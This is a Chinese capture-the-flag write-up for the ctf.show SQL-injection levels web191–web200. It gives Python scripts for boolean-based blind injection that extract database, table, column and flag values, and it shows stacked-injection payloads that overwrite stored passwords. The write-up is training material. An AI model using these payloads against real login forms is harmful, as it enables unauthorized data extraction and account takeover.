web191
多了一个正则绕过
上脚本布尔盲注
用ord
#author:yu22x
# web191 -- boolean-based blind SQL injection driver for the challenge login endpoint.
# Each request asks the backend one yes/no question ("is character i of the target
# value equal to code point j?") and reads the answer from which login error message
# comes back; nothing is echoed directly. One request per (position, candidate)
# pair, so this is slow: up to 96 requests per recovered character.
import requests
import string
# Per-instance challenge URL. The instance id is ephemeral, so this host will not
# resolve once the challenge instance has been torn down.
url="http://70adf0cb-2208-4974-b064-50a4f4103541.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits  # unused in this version: the loop below walks code points 32..127 instead
flag=''
for i in range(1,45):  # 1-based character position (what SQL substr expects); 44 is an assumed upper bound on the length
    print(i)
    for j in range(32,128):  # printable ASCII code points
        # Enumerate the database name
        # data={
        # 'username':f"'||if(ascii(substr(database(),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # Enumerate table names
        # data={
        # 'username':f"'||if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # Enumerate column names
        # data={
        # 'username':f"'||if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j},1,0)#",
        # 'password':'1'
        # }
        # Extract the data. ord() replaces the ascii() used in the commented-out
        # payloads above; the write-up attributes this level to an extra regex
        # filter, which is why the function name changed.
        data={
            'username':f"'||if(ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j},1,0)#",
            'password':'1'
        }
        r=requests.post(url,data=data)
        # The oracle: the literal is the JSON-escaped form of 密码错误 ("wrong
        # password"). The script treats that message as "the injected condition
        # was true", i.e. chr(j) is the character at position i.
        if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
            flag+=chr(j)
            print(flag)
            break
        # NOTE(review): if no candidate matches, the position is silently skipped
        # and extraction continues at i+1. There is also no timeout or status
        # check on the request, so a dropped connection presumably raises out of
        # the loop and loses the progress printed so far.
web192
直接不用ord了,改成跑字符。
#author:yu22x
# web192 -- same boolean-based blind approach as web191, but the candidate is
# compared as a one-character string literal ('{chr(j)}') instead of through
# ord()/ascii(). Still one request per (position, candidate) pair.
import requests
import string
# Per-instance challenge URL; the instance id is ephemeral.
url="http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits  # unused: the loop walks code points 32..127 instead
flag=''
for i in range(1,45):  # 1-based substr position; 44 is an assumed upper bound on the length
    print(i)
    for j in range(32,128):  # printable ASCII; chr(j) is spliced into the SQL literal below
        # Enumerate table names
        # data={
        # 'username':f"'||if((substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))='{chr(j)}',1,0)#",
        # 'password':'1'
        # }
        # Enumerate column names
        # data={
        # 'username':f"'||if((substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))='{chr(j)}',1,0)#",
        # 'password':'1'
        # }
        # Extract the data
        # NOTE(review): j=39 (') and j=92 (\) put an unbalanced quote/escape into
        # the single-quoted literal, so those two iterations send a malformed
        # query rather than a real comparison. With MySQL's usual case-insensitive
        # collations the = comparison also matches both cases, so the first hit
        # (the upper-case code point) is what gets recorded -- presumably why the
        # follow-up script prints its result lower-cased. TODO confirm against the
        # target collation.
        data={
            'username':f"'||if((substr((select f1ag from ctfshow_fl0g),{i},1))='{chr(j)}',1,0)#",
            'password':'1'
        }
        r=requests.post(url,data=data)
        # Oracle: JSON-escaped 密码错误 ("wrong password") is taken as "condition true".
        if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
            flag+=chr(j)
            print(flag)
            break
        # NOTE(review): a position with no matching candidate is silently skipped.
但是这个东西太慢了,找了一个稍微快一点的。
#@Auth:Sentiment
# web192, faster variant: binary search over the code point of each character
# instead of trying every candidate in turn. The payload asks "is character i
# below chr(mid)?" and halves the interval on the answer, so each character
# costs about 7 requests instead of up to 96.
import requests
# Per-instance challenge URL; the instance id is ephemeral.
url='http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php'
flag=''
for i in range(1,100):  # 1-based substr position; 99 is an assumed upper bound and the loop never stops early
    m=32
    n=127
    # Search interval [m, n). Invariant, assuming the true code point c lies in
    # [32, 127): m <= c < n. The loop ends when the interval holds one value.
    while 1:
        mid=(m+n)//2
        data={
        #'username':"admin' and (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<'{}'#".format(i,chr(mid)),#ctfshow_fl0g,ctfshow_user
        #'username':"admin' and (substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<'{}'#".format(i, chr(mid)), # id,f1ag
        'username':"admin' and (substr((select f1ag from ctfshow_fl0g),{},1))<'{}'#".format(i, chr(mid)), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
        'password':0
        }
        #print(data)
        r=requests.post(url=url,data=data)
        # Oracle: JSON-escaped 密码错误 ("wrong password") is taken to mean the
        # comparison substr(...) < chr(mid) held.
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            n=mid  # character sorts below mid
        else:
            m=mid  # character is mid or above
        if (m + 1 == n):
            flag += chr(m)
            # Printed lower-cased only; `flag` itself keeps whatever case the
            # string comparison resolved to (presumably a case-insensitive
            # collation -- TODO confirm).
            print(flag.lower())
            break
        # NOTE(review): if mid lands on 39 (') or 92 (\) the candidate breaks the
        # quoted literal and that probe is malformed. Past the end of the value,
        # MySQL substr yields '' which sorts below every candidate, so each
        # extra position appends chr(32) (a space) -- verify before trusting the
        # tail of the output.
web193
#@Auth:Sentiment
# web193 -- prefix-based blind extraction with LIKE: each request tests whether
# the target value starts with the characters recovered so far plus one more
# candidate (flag + j + '%'). One request per candidate, at most 41 per character.
import requests
# Per-instance challenge URL; the instance id is ephemeral.
url='http://617039c3-6190-4487-ab63-7d139273ad98.challenge.ctf.show/api/index.php'
flag=''
for i in range(100):  # at most 100 characters; the loop index itself is unused, the prefix grows via `flag`
    # Candidate alphabet, lower-case only (presumably relying on a case-insensitive
    # collation, under which LIKE matches either case -- TODO confirm).
    # NOTE(review): `_` is a LIKE single-character wildcard, so the pattern
    # flag + '_' + '%' matches *any* character at that position. The candidates
    # tried after it in this string (',', '{', '}') can therefore only ever be
    # recorded as '_', which would corrupt those positions of the recovered value.
    for j in 'abcdefghijklmnopqrstuvwxyz0123456789-_,{}':
        data={
        #'username':"admin' and (select group_concat(table_name) from information_schema.tables where table_schema=database())like'{}'#".format(flag+j+'%'),#ctfshow_flxg
        #'username':"admin' and (select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg')like'{}'#".format(flag+j+'%'), # id,f1ag
        'username':"admin' and (select f1ag from ctfshow_flxg)like'{}'#".format(flag+j+'%'), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
        'password':0
        }
        r=requests.post(url=url,data=data)
        # Oracle: JSON-escaped 密码错误 ("wrong password") is taken to mean the
        # LIKE pattern matched, i.e. j is the next character.
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            break
        # NOTE(review): if no candidate matches, the outer loop simply repeats
        # with the same prefix until i reaches 100 -- there is no early exit once
        # the value is complete, and no timeout or error check on the request.
web194
上一个脚本继续用
web195
堆叠注入
目标存在sql注入漏洞
目标未对";"号进行过滤
目标中间层查询数据库信息时可同时执行多条sql语句
username填写0时显示密码错误,就说明可以在这里进行堆叠,用命令把密码设置一下
0;update`ctfshow_user`set`pass`=1
1
或者
下面这两句话都是在username进行的,密码随便填写
0;update(ctfshow_user)set`username`=1;(必须是0,不然的话没有回显显示用户名错误)
1;update(ctfshow_user)set`pass`=1;
然后username=1&password=1登录就行
web196
过滤了select但是联合注入是可以绕过的
成功的原因就是进行注入的时候0返回null,然后select(常数)就会把常数放在row里面
username=0;select(1);
password=1
web197
$sql = "select pass from ctfshow_user where username = {$username};";
已知这个表叫做ctfshow_user
username=0;show tables;
password=ctfshow_user
web 198–web200
与上题同